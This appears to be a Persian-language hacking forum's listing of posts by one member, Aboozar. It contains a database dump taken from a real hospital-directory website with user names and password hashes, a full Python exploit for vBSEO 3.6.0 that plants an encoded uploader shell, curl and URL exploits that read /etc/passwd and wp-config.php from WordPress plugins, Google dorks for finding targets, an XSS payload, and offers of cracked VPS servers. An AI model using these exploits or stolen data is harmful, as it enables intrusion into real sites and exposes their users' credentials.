رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Aboozar

Member
  • تعداد ارسال ها

    79
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    1

تمامی مطالب نوشته شده توسط Aboozar

  1. Aboozar

    Target Trainings

    درود فراوان http://www.takecare.com.bd/tips.php?tid=5 http://www.takecare.com.bd/admin web application technology: PHP 5.3.29 back-end DBMS: MySQL >= 5.0.0 =================================================== available databases [2]: [*] information_schema [*] takecare_mtakecare =================================================== Database: takecare_mtakecare [59 tables] +-------------------------------------------+ | ambulance_service_types | | ambulance_services | | chambers | | contact_types | | countries | | currencies | | departments | | doctor_chamber_visitings | | doctor_chambers | | doctor_hospital_visitings | | doctor_hospitals | | doctor_languages | | doctor_specialities | | doctor_statuses | | doctor_titles | | doctor_types | | doctors | | genders | | hospital_ambulance_services | | hospital_contacts | | hospital_departments | | hospital_galleries | | hospital_gallery_images | | hospital_laboratory_test_charts | | hospital_location_maps | | hospital_promotion_package_rates | | hospital_promotion_package_specifications | | hospital_promotion_package_types | | hospital_promotion_packages | | hospital_room_rents | | hospital_room_types | | hospital_specialities | | hospital_statuses | | hospital_types | | hospitals | | laboratorytests | | languages | | location_levels | | locations | | login_tokens | | map_option_templates | | marital_statuses | | medicine_service_offers | | medicine_service_specialities | | medicine_service_types | | medicine_services | | page_image_slider_categories | | page_image_sliders | | page_menus | | page_stuff_categories | | page_stuffs | | photo_album_images | | photo_albums | | physician_types | | registration_statuses | | user_group_permissions | | user_groups | | users | | weekdays | +-------------------------------------------+ ================================================= Table: users [4 entries] +----------+ | username | +----------+ | admin | | akbar | | amal | | habib | +----------+ Table: users [4 entries] +-----------------------------------------------+ | password | +-----------------------------------------------+ | 1dec01141f9bfe969491af6e63ae1a14 (adminuser1) | | b1c503a64379f4f366a48bfe35d1757d | | d62d41cf17704ddd6cb22c9688130f73 | | f5dc036b9e98fcd1db88d8c76b353d56 | +-----------------------------------------------+
  2. Aboozar

    باز کردن پورت در Vps

    درود باتشکر از فعالیت مفید دوست عزیزمون. در پناه حق./
  3. Aboozar

    Formcraft Plugin File Upload

    درود فراوان. دوست عزیز پسورد فایل رو هم قرار بدین. یاحق./
  4. درود maltego رو در کالی لینوکس براتون آموزش میدیم. اول در سایت : https://www.paterva.com/web6/community/maltego/ مقاله زیر مطالعه کنید. لینک دانلود : http://s7.picofile.com/file/8244512134/information_gathering_by_maltego_2_.pdf.html یاحق./
  5. Aboozar

    باز کردن پورت در Vps

    درود یکی از دوستان خواسته بودن باز کردن پورت رو بهشون نشون بدم که طی آموزش گفتیم یه فیلمی هم بگیریم بزاریم سایت. با تشکر./ http://s6.picofile.com/file/8244212876/open_port_in_vps.rar.html
  6. درود. یکی از دوستان در یاهو درخواست این آموزش رو کرده بودن . گفتم فیلم بگیرم در آرشیو انجمن هم قرار بدیم. قابل توجه برخی از دوستان! کار شاخی نیست!!! فقط یه لوگین به vps اضافه این کار هست. http://s7.picofile.com/file/8240342868/bc_via_vps.avi.html
  7. Aboozar

    ورژن 2016.1 از Kali Linux رو نمایی شد!

    درود با آغاز شدن سال 2016 میلادی تیم توسعه Kali Linux نسخه جدید و آپدیت شده سیستم عامل کالی لینوکس را بر روی سایت خود قرار دادند که مشکلات نسخه قبلی این سیستم عامل بر طرف شده است و علاقه مندان به کالی لینوکس میتواند نسخه جدید این سیستم عامل را دانلود کنند. برای اطلاعات بیشتر به لینک زیر مراجعه فرمایید: کلیک کنید!
  8. درود. باتشکر از فعالیت همه دوستان. دوستان عزیزی که پاسخی نمیتونند به سوال کاربران بدن لطفا پست نزنن. اسپم محسوب میشه. تکرار مجدد باعث دریافت اخطار میشه. باتشکر./
  9. درود لینک پیکوفایل فیلم خدمت دوستان: http://s6.picofile.com/file/8228618234/Forbidden_Error_Bypass_Via_Perl_Based_Symlink_R3d_C0d3r_YouTube.mp4.html
  10. Aboozar

    تاپیک جامع Local Roots

    درود دوست عزیز این تایپیک برای 5 ماه پیشه. صبر کنید اگه استارتر تایپیک اومد خودشون قرار میدن. یا راه هایی هست برای پسورد توی گوگل سرچ کنید. یاعلی./ اسپم ها بزودی پاک میشن.//
  11. درود. عذر میخوام بخواطر فعالیت کم بنده . به علت مشغله کاری و کلاس های درسی هست. خب باتشکر از دوست خوبمون که این آموزش رو قرار دادن. یه کلیپ در آرشیوم بود در مورد این آسیب پذیری براتون قرار میدم. http://s1.picofile.com/file/8228249318/SSI_Injection_1.MP4.html
  12. Aboozar

    ..:: تایپیک درخواست Vps ::..

    درود بعلت اینکه درخواست هایی هست از طرف کاربران گرامی در مورد vps کرک شده. این تایپیک رو بازکردیم که دوستان اطلاع بدن . بنده و سایر دوستانی که در این زمینه فعالیت دارن از طریق پیام خصوصی برای افراد ارسال کنیم. نکته مهم ! دوستان توجه داشته باشند. وی پی اس فقط به افرادی تعلق میگیره که در انجمن بالای 5 پوست مفید داشته باشند. و فقط یک بار تعلق خواهد گرفت. هرگونه درخواست پی در پی و یا اسپم با برخورد رو به رو خواهد شد. باتشکر./
  13. درود آموزش هایی توی انجمن دوستان عزیز گذاشتن که یه متد دیگه رو هم واستون قرار میدم. روش همونه فقط کد نویسی بایپسر فرق کرده. خب دو فایل میزارم براتون آپلود کنید . کار تمام./ http://s3.picofile.com/file/8221245642/antisheller.rar.html
  14. با درود فراوان. شما ميتونيد آخرين ورژن رو دانلود كنيد.كه با يك سرچ در گوگل پيدا ميشه. و نيز شما ميتونيد با كمي تحقيق بيشتر در زمينه فشرده سازي فايل ها اطلاعات كسب كنيد متد هاي زيادي واسه اين كار هست. ياعلي./
  15. Aboozar

    WordPress WPTF Image Gallery 1.03 - Aribtrary File Download

    Title: Remote file download vulnerability in wptf-image-gallery v1.03 Author: Larry W. Cashdollar, @_larry0 Date: 2015-07-17 Download Site: https://wordpress.org/plugins/wptf-image-gallery Vendor: https://profiles.wordpress.org/sakush100/ Vendor Notified: 0000-00-00 Vendor Contact: [email protected] Description: WordPress True Fullscreen (WPTF) Gallery is a modern gallery plugin that supports true fullscreen and have a lot of features built with it. Vulnerability: The ./wptf-image-gallery/lib-mbox/ajax_load.php code doesn't sanitize user input or check that a user is authorized to download files. This allows an unauthenticated user to download sensitive system files: 1 <?php 2 error_reporting(0); 3 $homepage = file_get_contents($_GET['url']); 4 $homepage = str_replace("script", "mboxdisablescript", $homepage); 5 $homepage = str_replace("SCRIPT", "mboxdisablescript", $homepage); 6 echo $homepage; 7 ?> CVEID: OSVDB: Exploit Code: • $ curl http://server/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd
  16. با درود فراوان ! با آرزوي قبولي نماز و روزه هاي شما كاربران گرامي ! اين پارت از آموزش پوشه wp-content تغيير ميديم.زياد توضيح نميدم همه چيز توي فيلم واضح هست. باتشكر./ لينك دانلود: كليك كنيد!
  17. Aboozar

    متاسپلویت ؟!؟!؟!؟!؟

    دوست عزیز شما میتونید با ابزار آرمیتیج ویندوز تارگت رو مورد نفود قرار بدین که بحثش در انجمن موجوده یه سرچ کنید. با تشکر./
  18. درود دوستان عزیز ما در این تایپیک سعی میکنیم باگ هایی که نام بردیم رو تشریح کنیم و با قرار دادن تارگت هایی دوستان عزیز تازه کار رو بیشتر آشنا کنیم. دوستان عزیز ما آموزش شل گیری با هر یک از این باگ ها رو قرار میدیم. تاکید میکنم هیچ گونه سوالی یا اسپمی در این تایپیک نزنید. تایپیک رو با هماهنگی ادامه میدیم تا تایپیک فولی داشته باشیم. باگ های متفاوت رو باهم بررسی خواهیم کرد و با آموزش دسترسی رو از هر کدام از باگ ها بگیریم. با تشکر./
  19. Aboozar

    تاپیک جامع آموزش های مرتبط با Back Track و Kali Linux

    درود دوست عزیز شما میتونید با مراجعه به سایت کالی اون رو دانلود کنید. و چون فروش اون در فروشگاه های ایران غیر مجازه میتونید آخرین ورژن اون رو از فروشگاه های معتبر اینترنتی خرید کنید. ./
  20. نسخه فعلی وردپرس یعنی ورژن 4.2 که چند روز پیش منتشر شد دارای آسیب پذیری XSS میباشد مهاجم با ارسال کد جوا اسکریپت در قسمت نظرات میتواند کنترل وب سایت وردپرسی را در دست بگیرد. با حفره Cross Site Script مهاجم می تواند رمز عبور مدیر را تغییر یا حساب کاربری جدیدی در سایت ایجاد کند و یا انجام هر چیز دیگری که مدیر در حال حاضر وارد شده می تواند بر روی سیستم هدف انجام دهد. آسیب پذیری جدید XSS در این ورژن به تازگی منتشر شده که سایت های وردپرسی مورد حمله نفوذگر ها قرار داده است. این آسیب پذیری مشابه در نوامبر 2014 توسط Klikki هم در ورژن های قبل منتشر شده بود. در حال حاضر وردپرس ورژن های 4.2, 4.1.2, 4.1.1, 3.9.3. تمامی آسیب پذیر میباشد. <a title='x onmouseover=alert(unescape(/hello%20world/.source)) style=position:absolute;left:0;top:0;width:5000px;height:5000px AAAAAAAAAAAA...[64 kb]..AAA'></a> منبع: InterNet Security
  21. Aboozar

    Wordpress Creative Contact Form Upload Vulnerability

    درود با استفاده از metaspolit آموزشش فکر کنم در انجمن هست. نبود میتونید یه سرچی در موتور های جستجوگر کنید./
  22. Aboozar

    WP Marketplace 2.4.0 Remote Code Execution (Add WP Admin)

    درود یکم توی کد ها نگاه کنید میفهمید. دروک مربوط به گوگل : index of "wpmarketplace" هست بعد از سرچ اسکریپت که به زبان پایتون نوشته شده رو اجرا کنید و ادامه کار .... تمام./
  23. Aboozar

    آسیب پذیری در پلاگین slider-revolution

    درود امروزه شاهد آسیب پذیری جدید در پلاگین slider-revolution وردپرس میشیم که به راحتی میشه فایل کانفینگ رو دانلود کرد. دروک: revslider.php "index of" exploite http://localhost/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  24. Aboozar

    vBSEO 3.6.0 Auto Exploit

    #!C:\Python\python.exe # vBSEO 3.6.0 "proc_deutf()" Remote PHP Code Injection Exploit # Coded By xSecurity # Sec4ever.com # Greets To : UzunDz - Sec4ever - RAB3OUN - Lov3rDNS - Mr.Dm4r - HaNiBaL KSA - DeeF import urllib, urllib2, sys, os t = ''' __ _ _ __ __/ _\ ___ ___ _ _ _ __(_) |_ _ _ \ \/ /\ \ / _ \/ __| | | | '__| | __| | | | > < _\ \ __/ (__| |_| | | | | |_| |_| | /_/\_\\__/\___|\___| \__,_|_| |_|\__|\__, | |___/ [~] |vBSEO 3.6.0 "proc_deutf()" Remote PHP Code Injection Exploit [~] |CodedBy xSecurity | sec4ever.com [~] |To|UzunDz|Sec4ever|RAB3OUN|Lov3rDNS|Mr.Dm4r|HaNiBaL-KSA|DeeF [!] Usage: python vbseo.py target.com [without http://]''' print t url = sys.argv[1] # change uploader from here / encrypt base64 shell = 'CSR1cCA9IGJhc2U2NF9kZWNvZGUoIlBEOXdhSEFLWldOb2J5QW5QSFJwZEd4bFBsVndiRzloWkNCR2F​XeGxjeUI0VTJWamRYSnBkSGs4TDNScGRHeGxQaWM3Q21WamFHOGdKenhtYjNKdElHRmpkR2x2YmowaUl​pQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW0xMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFaUl​HNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWEJzYjJGa1pYSWlQaWM3Q21WamFHOGdKenhwYm5CMWR​DQjBlWEJsUFNKbWFXeGxJaUJ1WVcxbFBTSm1hV3hsSWlCemFYcGxQU0kxTUNJK1BHbHVjSFYwSUc1aGJ​XVTlJbDkxY0d3aUlIUjVjR1U5SW5OMVltMXBkQ0lnYVdROUlsOTFjR3dpSUhaaGJIVmxQU0pWY0d4dll​XUWlQand2Wm05eWJUNG5Pd3BwWmlnZ0pGOVFUMU5VV3lkZmRYQnNKMTBnUFQwZ0lsVndiRzloWkNJZ0t​TQjdDZ2xwWmloQVkyOXdlU2drWDBaSlRFVlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlJ​rbE1SVk5iSjJacGJHVW5YVnNuYm1GdFpTZGRLU2tnZXlCbFkyaHZJQ2M4WWo1VmNHeHZZV1FnUTI5dGN​HeGhkR1VnSVNFaFBDOWlQanhpY2o0OFluSStKenNnZlFvSlpXeHpaU0I3SUdWamFHOGdKenhpUGxWd2J​HOWhaQ0JHWVdsc1pXUWdJU0VoUEM5aVBqeGljajQ4WW5JK0p6c2dmUXA5Q2o4KyIpOwoJJHggPSBmaWx​lX3B1dF9jb250ZW50cygieHNlYy5waHAiLCAkdXApOwoJaWYoJHgpIHsgCglwcmludCAnc2VjNGV2ZXI​nOyAKCX0gZWxzZSB7IAoJCSRmcCA9IGZvcGVuKCd4c2VjLnBocCcsJ3cnKTsgCgkJZndyaXRlKCRmcCw​kdXApOyAKCX0=' def target(url,shell): try: ss = open('rzu.txt', 'a') req = urllib2.Request('http://www.'+url+'/vbseocp.php', headers={'Code':'ZWNobyAneFNlY3VyaXR5Jzs='}) post = urllib.urlencode({"char_repl":"'{${eval(base64_decode($_SERVER[HTTP_CODE]))}}.{${die()}}'=>"}) opener = urllib2.build_opener() b0x = opener.open(req,post).read() if 'xSecurity' in b0x: print '\n[+] '+url+'\n[+] vBSEO Infected ..\n[+] Trying Inject Uploader ..' ups = urllib2.Request('http://www.'+url+'/vbseocp.php', headers={'Code':shell}) inj = opener.open(ups,post).read() if 'sec4ever' in inj: rezult = '[!] Shell Has Been Created: '+url+'/xsec.php\n' print rezult ss.write(rezult) else: print '\n[~] Cannot Create Shell Use Manual Trick\n' else: print '\n[~] Not Infected ..\n' except urllib2.URLError, e: print '\n[*] '+url+'\n[*] '+str(e) print '[*] Use Manual Trick\n' pass target(url,shell)

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...